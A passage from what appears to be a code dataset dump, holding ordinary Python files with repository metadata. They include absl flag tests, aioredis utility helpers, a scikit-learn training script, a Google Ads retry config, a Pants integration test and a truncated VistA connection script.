format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| true | true |
f72ed67b5fe1b20f3cdf6654c9891e80bdd774e0 | 2,002 | py | Python | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | 2 | 2019-06-26T21:31:03.000Z | 2019-06-27T16:59:58.000Z | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | """
provide global explanation methods
author: Xiaoqi
date: 2019.10.29
"""
from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
"""
Initialize a feature global explainer
:param x_train: input data
:param y_train: output data
:param model: the underlying black-box model to be interpreted
"""
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
"""
Global variable influence measured by permutation importance
:param use_eli5: bool, if True, use the ELI5 implementation, otherwise the raw implementation
:return: feature importance ranking plot
"""
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
"""
Global variable influence measured by feature weights
:return: an explanation of estimator parameters (weights)
"""
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
"""
Global variable influence measured by SHAP feature importance (average absolute marginal
effect of each feature)
:return: a summary plot visualized using SHAP
"""
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| 37.773585 | 105 | 0.676823 | from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| true | true |
f72ed6bd8cbd39180af1615ae392cf981ff63a32 | 4,411 | py | Python | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional tests for Flag classes.
Most of the Flag classes are covered in the flags_test.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| 32.674074 | 79 | 0.717751 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| true | true |
f72ed6f3f3b067f75edf1591df918110a3cd1d90 | 71 | py | Python | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-01-28T03:54:19.000Z | 2022-01-28T03:54:19.000Z | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | null | null | null | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-02-17T19:57:45.000Z | 2022-02-17T19:57:45.000Z | #!/usr/bin/env python
from anti_viral_protocol import main
main.run()
| 14.2 | 36 | 0.774648 |
from anti_viral_protocol import main
main.run()
| true | true |
f72ed76a2412ba2f6fbe6587e6f523c5dadb2346 | 6,881 | py | Python | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
# NOTE: never put here anything else;
# just this basic types
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
"""Encodes arguments into redis bulk-strings array.
Raises TypeError if any of args not of bytearray, bytes, float, int, or str
type.
"""
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
"""Parse Redis connection URI.
Parse according to IANA specs:
* https://www.iana.org/assignments/uri-schemes/prov/redis
* https://www.iana.org/assignments/uri-schemes/prov/rediss
Also more rules applied:
* empty scheme is treated as unix socket path no further parsing is done.
* 'unix://' scheme is treated as unix socket path and parsed.
* Multiple query parameter values and blank values are considered error.
* DB number specified as path and as query parameter is considered error.
* Password specified in userinfo and as query parameter is
considered error.
"""
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| 27.8583 | 79 | 0.608923 | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| true | true |
f72ed7c91647a2ffe95753344f2a7f08a78ecf34 | 1,683 | py | Python | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | 5 | 2021-03-10T17:10:21.000Z | 2021-10-06T16:34:17.000Z | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | # Import libraries
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
#Otsustuspuud
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
# data_table.groupby("keeletase").A.plot(kind='kde')
#data_table.groupby("keeletase").A.hist(alpha=0.4)|
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder() #independent variable encoder
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
#Transforming values into percentages of total and splitting into target and features
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
# X_train, X_test, y_train, y_test =\
# train_test_split(features.loc[:,'A':"Z"], target_var, test_size = 0.5, random_state=1111)
# Get the dataset
# dataset = datasets.load_iris()
# Split the dataset into features and labels
X = features
y = target_var
# Split the dataset into training (80%) and testing (20%) data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
# Build the classifier and make prediction
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
# Print the confusion matrix
# Save the model to disk
joblib.dump(classifier, 'classifier.joblib')
| 25.5 | 108 | 0.764112 |
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder()
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
X = features
y = target_var
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
joblib.dump(classifier, 'classifier.joblib')
| true | true |
f72ed89ef91faf30d9d61698bce073331a1ee00a | 1,185 | py | Python | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| 28.902439 | 63 | 0.562025 | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| true | true |
f72ed8da97fec762efa00349e44eae5dbdee44f0 | 1,233 | py | Python | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
# Run once to start up, and then capture the file content.
run()
good_content = read_file(f)
# Edit the file.
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
# Re-run and confirm that the file was fixed.
run()
assert good_content == read_file(f)
| 30.073171 | 101 | 0.612328 |
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
run()
good_content = read_file(f)
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
run()
assert good_content == read_file(f)
| true | true |
f72ed91758bdb810aba2360a35143bf14981d80f | 1,179 | py | Python | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | 1 | 2015-12-10T20:45:34.000Z | 2015-12-10T20:45:34.000Z | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | null | null | null | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path = [sys.argv[7] + '/lib/vista'] + sys.path
from OSEHRAHelper import ConnectToMUMPS,PROMPT
VistA=ConnectToMUMPS(sys.argv[1],sys.argv[3],sys.argv[4])
